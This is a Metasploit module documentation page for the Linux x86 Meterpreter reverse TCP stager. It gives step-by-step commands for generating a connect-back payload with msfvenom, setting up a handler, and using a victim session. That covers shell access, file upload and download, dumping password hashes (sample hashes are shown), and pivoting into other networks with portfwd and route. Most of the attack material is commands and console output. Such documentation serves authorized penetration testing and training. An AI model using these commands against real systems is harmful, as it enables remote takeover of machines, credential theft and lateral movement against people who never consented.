Linux Mettle x86, Reverse TCP Stager - Metasploit
This page contains detailed information about how to use the payload/linux/x86/meterpreter/reverse_tcp metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Deploying linux/x86/meterpreter/reverse_tcp
- Important Basic Commands
- Using a Post module
- Using the Post Exploitation API in IRB
- Routing Through the portfwd Commands
- Routing Through msfconsole
- Msfconsole Usage
- Related Pull Requests
- See Also
- Authors
- Version
Module Overview
Name: Linux Mettle x86, Reverse TCP Stager
Module: payload/linux/x86/meterpreter/reverse_tcp
Source code: modules/payloads/stagers/linux/x86/reverse_tcp.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): x86
Supported platform(s): Linux, Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: -
Inject the mettle server payload (staged). Connect back to the attacker
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use payload/linux/x86/meterpreter/reverse_tcp
msf payload(reverse_tcp) > show options
... show and set options ...
msf payload(reverse_tcp) > generate
To learn how to generate payload/linux/x86/meterpreter/reverse_tcp with msfvenom, please read this.
Required Options
- LHOST: The listen address (an interface may be specified)
Knowledge Base
linux/x86/meterpreter/reverse_tcp is the most popular payload against the Linux platform. It allows you to remotely take over the compromised system, having control of the file system, collect sensitive information such as credentials using post modules, etc.
linux/x86/meterpreter/reverse_tcp is also the default payload for most Linux exploits.
Vulnerable Application
linux/x86/meterpreter/reverse_tcp should work on either 32 or 64-bit Linux platforms.
Deploying linux/x86/meterpreter/reverse_tcp
linux/x86/meterpreter/reverse_tcp can be used in two different ways.
As an exploit payload
Many Linux exploits support native payloads, but not always. To check this, you can use the info
command on the exploit you want to use:
msf exploit(lsa_transnames_heap) > info
Name: Samba lsa_io_trans_names Heap Overflow
Module: exploit/linux/samba/lsa_transnames_heap
Platform: Linux
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Good
Disclosed: 2007-05-14
...
If the platform field includes Linux, then that means you can use linux/x86/meterpreter/reverse_tcp and other Linux payloads.
Sometimes, you need to select a specific target to be able to use a native Linux payload. To check this, do:
show targets
If there is a Linux target, use that:
set TARGET [index]
To actually set the payload:
- In msfconsole, load the exploit.
- Do:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
- Set the
LHOST
option, which is the IP the payload should connect back to. - Run the exploit
As a standalone executable
To use linux/x86/meterpreter/reverse_tcp as an executable, first you can generate it with msfvenom:
./msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f elf -o /tmp/payload.bin
Before sending the executable to the victim machine, you need to set up the handler on your end:
- Start msfconsole
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD linux/x86/meterpreter/reverse_tcp
- Do:
set LHOST [Your IP]
- Do:
run
And that should start the listener. When the victim runs the malicious executable, you should receive a session:
msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.23.1:4444
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 172.16.23.182
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.182:45009) at 2016-07-06 22:40:35 -0500
meterpreter >
Important Basic Commands
Here is a list of some of the common commands you might need while using the Linux Meterpreter:
pwd
The pwd
command tells you the current working directory. For example:
meterpreter > pwd
/home/sinn3r/Desktop
cd
The cd command allows you to change directories. Example:
meterpreter > cd /tmp
cat
The cat command allows you to see the content of a file:
meterpreter > cat /tmp/data.txt
hello world
upload
The upload
command allows you to upload a file to the remote target. For example:
meterpreter > upload /tmp/data.bin /home/sinn3r/Desktop
[*] uploading : /tmp/data.bin -> /home/sinn3r/Desktop
[*] uploaded : /tmp/data.bin -> /home/sinn3r/Desktop/data.bin
meterpreter >
download
The download
command allows you to download a file from the remote target to your machine. For example:
meterpreter > download /home/sinn3r/Desktop/data.bin /tmp
[*] downloading: /home/sinn3r/Desktop/data.bin -> /tmp/data.bin
[*] download : /home/sinn3r/Desktop/data.bin -> /tmp/data.bin
ifconfig/ipconfig
ifconfig
and ipconfig
are actually the same thing. They allow you to see the network
interfaces on the remote machine.
getuid
The getuid
command tells you the current user that Meterpreter is running on. For example:
meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
execute
The execute
command allows you to execute a command or file on the remote machine.
For example:
meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
Process 5292 created.
ps
The ps
command lists the running processes on the remote machine.
shell
The shell
command allows you to interact with the remote machine's terminal (or shell). For
example:
meterpreter > shell
Process 5302 created.
Channel 6 created.
$
If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
sysinfo
The sysinfo
command shows you basic information about the remote machine. Such as:
- Computer name
- OS name
- Architecture
- Meterpreter type
For example:
meterpreter > sysinfo
Computer : sinn3r-virtual-machine
OS : Linux sinn3r-virtual-machine 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 (i686)
Architecture : i686
Meterpreter : x86/linux
meterpreter >
Other commands
For a complete list of Linux Meterpreter commands, do the following at the prompt:
meterpreter > help
Using a Post module
One of the best things about Meterpreter is you have access to a variety of post modules that "shell" sessions might not have. Post modules provide you with more capabilities to collect data from the remote machine automatically. For example, stealing credentials from the system or third-party applications, or modify settings, etc.
To use a post module from the Meterpreter prompt, simply use the run
command. The following
is an example of collecting Linux hashes using post/linux/gather/hashdump:
meterpreter > run post/linux/gather/hashdump
[+] root:$6$cq9dV0jD$DZNrPKKIzcJaJ1r1xzdePEJTzn5f2V5lm9CnSdkMRPJfYy7QVx2orpzlf1XXBbIRZs7kT9CmYEMApfUIrWZsj/:0:0:root:/root:/bin/bash
[+] sinn3r:$6$S5lRz0Ji$bS0rOko3EVsAXwqR1rNcE/EhpnezmKH08Yioxyz/gLZAGh3AoyV5qCglvHx.vSINJNqs1.xhJix3pWX7jw8n0/:1000:1000:sinn3r,,,:/home/sinn3r:/bin/bash
[+] Unshadowed Password File: /Users/wchen/.msf4/loot/20160707112433_http_172.16.23.182_linux.hashes_845236.txt
meterpreter >
Note that in order to collect Linux hashes, Meterpreter needs to run as root.
Using the Post Exploitation API in IRB
To enter IRB, do the following at the Meterpreter prompt:
meterpreter > irb
[*] Starting IRB shell
[*] The 'client' variable holds the meterpreter client
>>
The client object
The client object in Meterpreter allows you to control or retrieve information about the host. For example, this allows you to get the current privilege our payload is running as:
>> client.sys.config.getuid
=> "uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000"
To explore the client object, there are a few tricks. For example, you can use the #inspect method to inspect it:
>> client.inspect
You can also use the #methods method to see what methods you can use:
>> client.methods
To review the source of the method, you can use the #source_location method. For example, say we want to see the source code for the #getuid method:
>> client.sys.config.method(:getuid).source_location
=> ["/Users/sinn3r/rapid7/msf/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb", 32]
The first element of the array is the location of the file. The second is the line number of the method.
Routing Through the portfwd Commands
The portfwd
command allows you to talk to a remote service like it's local. For example, if you
cannot talk to the blocked HTTP service remotely on the compromised host due to whatever reason,
then you can use portfwd to establish that tunnel:
meterpreter > portfwd add -l 8000 -p 8000 -r 172.16.23.182
[*] Local TCP relay created: :8000 <-> 172.16.23.182:8000
And then talk to it like it's a local service:
msf auxiliary(http_version) > run
[*] 127.0.0.1:8000 SimpleHTTP/0.6 Python/2.7.6
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(http_version) >
Routing Through msfconsole
The route
command from the msf prompt can also be used like portfwd, but it also allows you
to reach out to other networks that the compromised host is connected to.
To use route
, first look at the ipconfig/ifconfig output and determine your pivot point:
meterpreter > ipconfig
Make sure you know the subnet, netmask, and the Meterpreter/session ID. Return to the msf prompt, and establish that route:
msf > route add 192.168.1.0 255.255.255.0 1
At that point, you should have a working pivot. You can use other Metasploit modules to explore or exploit more hosts on the network, or use auxiliary/server/socks4a and Proxychains to allow other third-party tools to do the same.
Go back to menu.
Msfconsole Usage
Here is how the linux/x86/meterpreter/reverse_tcp payload looks in the msfconsole:
msf6 > use payload/linux/x86/meterpreter/reverse_tcp
msf6 payload(linux/x86/meterpreter/reverse_tcp) > show info
Name: Linux Mettle x86, Reverse TCP Stager
Module: payload/linux/x86/meterpreter/reverse_tcp
Platform: Linux, Linux
Arch: x86
Needs Admin: No
Total size: 123
Rank: Normal
Provided by:
William Webb <[email protected]>
skape <[email protected]>
egypt <[email protected]>
tkmru
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Inject the mettle server payload (staged). Connect back to the
attacker
Module Options
This is a complete list of options available in the linux/x86/meterpreter/reverse_tcp payload:
msf6 payload(linux/x86/meterpreter/reverse_tcp) > show options
Module options (payload/linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Advanced Options
Here is a complete list of advanced options supported by the linux/x86/meterpreter/reverse_tcp payload:
msf6 payload(linux/x86/meterpreter/reverse_tcp) > show advanced
Module advanced options (payload/linux/x86/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugLevel 0 yes Set debug level for meterpreter 0-3 (Default output is strerr)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root)
PrependFork false no Prepend a stub that starts the payload in its own process via fork
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
RemoteMeterpreterDebugFile no Redirect Debug Info to a Log File
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Go back to menu.
Related Pull Requests
- #14584 Merged Pull Request: Implement the zeitwerk autoloader within lib/msf/base
- #12271 Merged Pull Request: Linux reverse_tcp should read known # of bytes
- #8337 Merged Pull Request: set the correct schema for linux meterpreter reverse_tcp stages
- #8279 Merged Pull Request: move mettle payloads to meterpreter, add reverse_http/s stageless
- #7634 Merged Pull Request: Implement universal HTTP/S handlers for Meterpreter payloads
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #5367 Merged Pull Request: Create new UUID stagers
- #5300 Merged Pull Request: Multi transport support, connection resiliency changes, payload ports, and more
- #5214 Merged Pull Request: Connection recovery
- #2525 Merged Pull Request: Change module boilerplate
- #2426 Merged Pull Request: Find and replace Msf::Config.install_root, "data"
- #1241 Merged Pull Request: Removed all $Id$ and $Revision$ occurences
Go back to menu.
See Also
Check also the following modules related to this module:
- payload/linux/x86/adduser
- payload/linux/x86/chmod
- payload/linux/x86/exec
- payload/linux/x86/meterpreter/bind_ipv6_tcp
- payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid
- payload/linux/x86/meterpreter/bind_nonx_tcp
- payload/linux/x86/meterpreter/bind_tcp
- payload/linux/x86/meterpreter/bind_tcp_uuid
- payload/linux/x86/meterpreter/find_tag
- payload/linux/x86/meterpreter_reverse_http
- payload/linux/x86/meterpreter_reverse_https
- payload/linux/x86/meterpreter/reverse_ipv6_tcp
- payload/linux/x86/meterpreter/reverse_nonx_tcp
- payload/linux/x86/meterpreter_reverse_tcp
- payload/linux/x86/meterpreter/reverse_tcp_uuid
- payload/linux/x86/metsvc_bind_tcp
- payload/linux/x86/metsvc_reverse_tcp
- payload/linux/x86/read_file
- payload/linux/x86/shell/bind_ipv6_tcp
- payload/linux/x86/shell_bind_ipv6_tcp
- payload/linux/x86/shell/bind_ipv6_tcp_uuid
- payload/linux/x86/shell/bind_nonx_tcp
- payload/linux/x86/shell/bind_tcp
- payload/linux/x86/shell_bind_tcp
- payload/linux/x86/shell_bind_tcp_random_port
- payload/linux/x86/shell/bind_tcp_uuid
- payload/linux/x86/shell_find_port
- payload/linux/x86/shell/find_tag
- payload/linux/x86/shell_find_tag
- payload/linux/x86/shell/reverse_ipv6_tcp
- payload/linux/x86/shell/reverse_nonx_tcp
- payload/linux/x86/shell/reverse_tcp
- payload/linux/x86/shell_reverse_tcp
- payload/linux/x86/shell_reverse_tcp_ipv6
- payload/linux/x86/shell/reverse_tcp_uuid
Authors
- William Webb <william_webb[at]rapid7.com>
- skape
- egypt
- tkmru
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.